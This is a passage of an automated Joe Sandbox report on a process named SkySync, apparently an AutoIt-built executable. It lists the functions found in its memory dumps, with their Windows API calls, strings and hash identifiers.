Part of subcall function 00AC0D0D: CloseHandle.KERNELBASE(00000000,00B20994,00000000,?,00AC8449,00B20994,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC0D5D
Part of subcall function 00AC0D0D: GetLastError.KERNEL32(?,00AC8449,00B20994,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00AC0D67

Strings

@, xrefs: 00AC83A0

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorLast$CloseHandle$FileType
String ID: @
API String ID: 604914513-2766056989
Opcode ID: 9403571614ddb81078d14dad911ec324e4337c4e56928f6da385174639a79b5c
Instruction ID: 587152d98ea294481fcc23d4b167306fe49c0004430e185202b8335fd6627e7b
Opcode Fuzzy Hash: 9403571614ddb81078d14dad911ec324e4337c4e56928f6da385174639a79b5c
Instruction Fuzzy Hash: 3E22E2719002069BEB298F68DD41FFD7BA5BB05320F2A422DE521AB2E2DF3D8D51C751

Function 00AB3459 Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AB9E3B: EnterCriticalSection.KERNEL32(00AB1003,?,00AB9CAC,0000000D), ref: 00AB9E66

DecodePointer.KERNEL32(00B4CB70,0000001C,00AB33B2,00AB1003,00000001,00000000,?,00AB3300,000000FF,?,00AB9E5E,00000011,00AB1003,?,00AB9CAC,0000000D), ref: 00AB34A6
DecodePointer.KERNEL32(?,00AB3300,000000FF,?,00AB9E5E,00000011,00AB1003,?,00AB9CAC,0000000D), ref: 00AB34B7
EncodePointer.KERNEL32(00000000,?,00AB3300,000000FF,?,00AB9E5E,00000011,00AB1003,?,00AB9CAC,0000000D), ref: 00AB34D0
DecodePointer.KERNEL32(-00000004,?,00AB3300,000000FF,?,00AB9E5E,00000011,00AB1003,?,00AB9CAC,0000000D), ref: 00AB34E0
EncodePointer.KERNEL32(00000000,?,00AB3300,000000FF,?,00AB9E5E,00000011,00AB1003,?,00AB9CAC,0000000D), ref: 00AB34E6
DecodePointer.KERNEL32(?,00AB3300,000000FF,?,00AB9E5E,00000011,00AB1003,?,00AB9CAC,0000000D), ref: 00AB34FC
DecodePointer.KERNEL32(?,00AB3300,000000FF,?,00AB9E5E,00000011,00AB1003,?,00AB9CAC,0000000D), ref: 00AB3507

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Pointer$Decode$Encode$CriticalEnterSection
String ID:
API String ID: 3368343417-0
Opcode ID: f9e3611df5b9c7f20bcab38b5b13e254f5033041d49964ac45ab12357b843aef
Instruction ID: 368d42b24acf61f846183e79038c5301c67ddab6880cbfdb5e39aaf769c5a502
Opcode Fuzzy Hash: f9e3611df5b9c7f20bcab38b5b13e254f5033041d49964ac45ab12357b843aef
Instruction Fuzzy Hash: 48318A72944309AFDF20AFA8EC457DD7BB8BF48312F10416AE004A72A2CFB60A41CF55

Function 00AA50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA5109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA512A
ShowWindow.USER32(00000000), ref: 00AA513E
ShowWindow.USER32(00000000), ref: 00AA5147

Strings

edit, xrefs: 00AA5124
AutoIt v3, xrefs: 00AA5101, 00AA5106, 00AA5107

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 2f8d7a0abfe5f975ea08f31bb9baba527bae87d2021de613ecef00c2fb800bd8
Instruction ID: c9df96ba0c08fe61857361239c6041ee1fd8e9b26d84ca40eaa5cc6c6f9e4d3e
Opcode Fuzzy Hash: 2f8d7a0abfe5f975ea08f31bb9baba527bae87d2021de613ecef00c2fb800bd8
Instruction Fuzzy Hash: 7EF0B7716953947EEA316B277C48F272E7DE7C7F51F00019AB904A31B1CEA21851DAB0

Function 00AF7681 Relevance: 9.1, APIs: 6, Instructions: 101
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00AF7698
ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AF76CF
EnterCriticalSection.KERNEL32(?), ref: 00AF76EB
LeaveCriticalSection.KERNEL32(?), ref: 00AF7765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AF777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF7799

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 333b11109aacc3a4c9d2ec233031af8a3edd15676caf375a243d4cd1cd614d62
Instruction ID: 0418a5ab37d8ccb90563fac7771f13e8d987fe7e65dc3df4303a321449f6f7eb
Opcode Fuzzy Hash: 333b11109aacc3a4c9d2ec233031af8a3edd15676caf375a243d4cd1cd614d62
Instruction Fuzzy Hash: 52318131914109EFCB10EFA4DD85EAFB7B8EF45700F1440A5F904AB256DB309E51CBA0

Function 00AC7F2D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,?,?,?,00000000,00000109), ref: 00AC7F46
GetProcAddress.KERNEL32(00000000), ref: 00AC7F4D
CreateFileW.KERNELBASE(00000000,?,?,?,00000001,?,00000000,00000001,?,?,?,00000000,00000109), ref: 00AC7FAB

Strings

CreateFile2, xrefs: 00AC7F3C
kernel32.dll, xrefs: 00AC7F41

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressCreateFileHandleModuleProc
String ID: CreateFile2$kernel32.dll
API String ID: 2580138172-1988006178
Opcode ID: 7598c0b62c8e6e0bc83f5ce9db65f4ba325303ffb8bca62efd0de10a3f1deefa
Instruction ID: 797f25ad90ed989cf57b3147264adcb7601ee2583183d32ab869b0898c91801e
Opcode Fuzzy Hash: 7598c0b62c8e6e0bc83f5ce9db65f4ba325303ffb8bca62efd0de10a3f1deefa
Instruction Fuzzy Hash: B811F37190420AAFDF02AF94DC45AEE7BB5BF08351F104518FD14A62A1DB71DA21DF91

Function 00AA56F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA57EB
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AE0C5B

Strings

Line %d: , xrefs: 00AE0CCB
AutoIt - , xrefs: 00AA5760

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: IconLoadNotifyShell_String
String ID: Line %d: $AutoIt -
API String ID: 3363329723-4094128768
Opcode ID: a63bad252c8acb45d0f7d93f2e027972fc9a6bb0324fe2076c2d3f2b676b405b
Instruction ID: a28728c292349789435d56be328634d01d9699b0424885499df0aa1d740ae579
Opcode Fuzzy Hash: a63bad252c8acb45d0f7d93f2e027972fc9a6bb0324fe2076c2d3f2b676b405b
Instruction Fuzzy Hash: 1C418271508304AAD321EB64DD85FEF77ECAF86350F100A1AF185931E2EF74A649CB96

Function 00A91284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A91275,SwapMouseButtons,00000004,?), ref: 00A912A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A91275,SwapMouseButtons,00000004,?), ref: 00A912C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00A91275,SwapMouseButtons,00000004,?), ref: 00A912EB

Strings

Control Panel\Mouse, xrefs: 00A912A6

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 42d981698407dee17aa9b0f4785cabdcbb88d331cfe8b362ac1aba0e84cc4f4e
Instruction ID: 8934aa4ad513b756ac82c733b9fe4d6b835d355061ae32930bd1b2703446521a
Opcode Fuzzy Hash: 42d981698407dee17aa9b0f4785cabdcbb88d331cfe8b362ac1aba0e84cc4f4e
Instruction Fuzzy Hash: A1113371610219BEEF209FA5D884EEFBBF8EF04740B004569E805E7210E6319E409BA0

Function 00ABD802 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 00AB9E3B: EnterCriticalSection.KERNEL32(00AB1003,?,00AB9CAC,0000000D), ref: 00AB9E66

GetStartupInfoW.KERNEL32(?,00B4CF10,00000064,00AB7F17,00B4CD38,00000014), ref: 00ABD895
GetFileType.KERNEL32(00000001), ref: 00ABD929

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CriticalEnterFileInfoSectionStartupType
String ID:
API String ID: 4158522439-0
Opcode ID: 5dc840deb4fccc17999671ac738900e6299457f0925bd3848507d2d46a216c08
Instruction ID: 339dcb859ee33fd988dd37bd86ca6a1e130bd77d86f3ab63bd5f723356fbf268
Opcode Fuzzy Hash: 5dc840deb4fccc17999671ac738900e6299457f0925bd3848507d2d46a216c08
Instruction Fuzzy Hash: 0081D8719057458FCB24CF68C8416EDBBF8BF0A365F24425ED4A6AB3D2EB349842CB54

Function 00AC194E Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,?,?,00000000,?,?), ref: 00AC1988
SetFilePointerEx.KERNELBASE(00000000,?,?,?,?,?,?), ref: 00AC199C
GetLastError.KERNEL32(?,?), ref: 00AC19A2

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 1d034050ae7a4b9e7bf15ad17790af8ecac05a7df55561cf519848e9473d7347
Instruction ID: adf88c7aec0bc3134f1fe4edd30066732454629d41fe4069ac7efbde661e2f06
Opcode Fuzzy Hash: 1d034050ae7a4b9e7bf15ad17790af8ecac05a7df55561cf519848e9473d7347
Instruction Fuzzy Hash: 7111E332710619ABDB21ABA8DC91FEE377CAF46720F110659F520AB1D3DB74E80187A1

Function 00B0D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af6e35ffe2272164518b3de30fcf38884c4f1bc4d9fb5091d3d81b8fd12b0058
Instruction ID: c448df2febcc23e37c349361a353076c646d89daf74bbb8474d670bb497a4d59
Opcode Fuzzy Hash: af6e35ffe2272164518b3de30fcf38884c4f1bc4d9fb5091d3d81b8fd12b0058
Instruction Fuzzy Hash: 82F128706083419FCB14DF68C584A6ABBE5FF88314F14896DF8999B391DB31E946CF82

Function 00A9AAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AB07EC
Part of subcall function 00AB07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AB07F4
Part of subcall function 00AB07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AB07FF
Part of subcall function 00AB07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AB080A
Part of subcall function 00AB07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AB0812
Part of subcall function 00AB07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AB081A

Part of subcall function 00AAFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A9AC6B), ref: 00AAFFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A9AD08
OleInitialize.OLE32(00000000), ref: 00A9AD85
CloseHandle.KERNELBASE(00000000), ref: 00AD2F56

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 997f72ba59bb67d07560f9dafc9b840df178ef3d9840ff31cb3f556eb42df32a
Instruction ID: a9bd1d121404b3f41bbe97975bb270d12eece919293cb6abaab0c6cc3b087e04
Opcode Fuzzy Hash: 997f72ba59bb67d07560f9dafc9b840df178ef3d9840ff31cb3f556eb42df32a
Instruction Fuzzy Hash: 1181B9B1B983408EC385EF29BD447657FE9EB59316B1081EAD819C7372EF70480A8F54

Function 00AF7221 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00AF7016,00000000,?,00AF710A,00000000,00000000,00AD2F49), ref: 00AF7237
GetCurrentProcess.KERNEL32(?,00000000,?,00AF7016,00000000,?,00AF710A,00000000,00000000,00AD2F49), ref: 00AF723F
DuplicateHandle.KERNELBASE(00000000,?,00AF7016,00000000,?,00AF710A,00000000,00000000,00AD2F49), ref: 00AF7246

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: eb6ef66a74b30a704b0fdd475baf55aed282121af2adf79a5d9a5862aa77f74f
Instruction ID: dddab0d806f7fd20f89516facc70d3910761a7c8140e66fe82f8807b0c02ecc9
Opcode Fuzzy Hash: eb6ef66a74b30a704b0fdd475baf55aed282121af2adf79a5d9a5862aa77f74f
Instruction Fuzzy Hash: 19D0C736020208BBC7212BE8EC0EF7A3B3CDBC5B22F20401AF204861129E7088028720

Function 00AF7079 Relevance: 4.5, APIs: 3, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 00AF77EB: InterlockedExchange.KERNEL32(?,?), ref: 00AF77FE
Part of subcall function 00AF77EB: EnterCriticalSection.KERNEL32(?,?,00A9C2B6,?,?), ref: 00AF780F
Part of subcall function 00AF77EB: TerminateThread.KERNEL32(00000000,000001F6,?,00A9C2B6,?,?), ref: 00AF781C
Part of subcall function 00AF77EB: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A9C2B6,?,?), ref: 00AF7829
Part of subcall function 00AF77EB: InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF783C
Part of subcall function 00AF77EB: LeaveCriticalSection.KERNEL32(?,?,00A9C2B6,?,?), ref: 00AF7843

CloseHandle.KERNELBASE(?,?,00AF70DF), ref: 00AF708A
CloseHandle.KERNEL32(?,?,00AF70DF), ref: 00AF7093
DeleteCriticalSection.KERNEL32(?,?,00AF70DF), ref: 00AF70A6

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 2929296749-0
Opcode ID: af7bf86ef13313d81fb24e1d9976962c01498017ce830573d5cdebcc44769f54
Instruction ID: 0c0e7579baec8eb8c8ce3832ef20213cfe4e03cadf514ebd20ed1674d50ff3d5
Opcode Fuzzy Hash: af7bf86ef13313d81fb24e1d9976962c01498017ce830573d5cdebcc44769f54
Instruction Fuzzy Hash: A2E0E233020646EBC7517FA4FD0888AFFB9BF4CB113640122F10582932CF70A4A2CB64

Function 00AA31BF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00AE0375

Part of subcall function 00AB0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA2A58,?,00008000), ref: 00AB02A4

Part of subcall function 00AB09C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB09E4

Strings

X, xrefs: 00AE0343

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 8875641111b13c7370cb6930f20bff0c55cd720fe0f181f57ee8b458dc1f194a
Instruction ID: e44b4d237e00d6960384ef4b6cd0d7d1367102babe0d3920a4975427ae456c1a
Opcode Fuzzy Hash: 8875641111b13c7370cb6930f20bff0c55cd720fe0f181f57ee8b458dc1f194a
Instruction Fuzzy Hash: 2421A571A002889BDF51DF98D845BEE7BFC9F4A304F10405AF414A7282DBB59A8DDFA1

Function 00AB0E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00AB0ED5
CreateToolhelp32Snapshot.KERNEL32 ref: 00AB0EE7

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseCreateHandleSnapshotToolhelp32
String ID:
API String ID: 3280610774-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: e802223df535c7ba39b4f8fa0be480b4f9066a6c8b22d239f5d19b295ad18160
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: AE319971A001099FD758DF58C4809AAFBBAFF59310F648A95E409CF266D731EDC1DB90

Function 00AA59D3 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AA5A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA5ABB

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 8e81085bc9d5a729e8357244225b48e4403776ddfb86184019b8917c9e6b57c3
Instruction ID: 7349b77cec16923239193e877f5fae2ffd4867c9144419fcc54af906db433acf
Opcode Fuzzy Hash: 8e81085bc9d5a729e8357244225b48e4403776ddfb86184019b8917c9e6b57c3
Instruction Fuzzy Hash: 1D31B9B0B057019FC720DF34D888697BBF8FB4A345F000A6EF59A83291DB71A944CB55

Function 00AA5F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00AA5FEF

Part of subcall function 00AB359C: DecodePointer.KERNEL32(00000001,?,00AA6004,00AE8892), ref: 00AB35AE
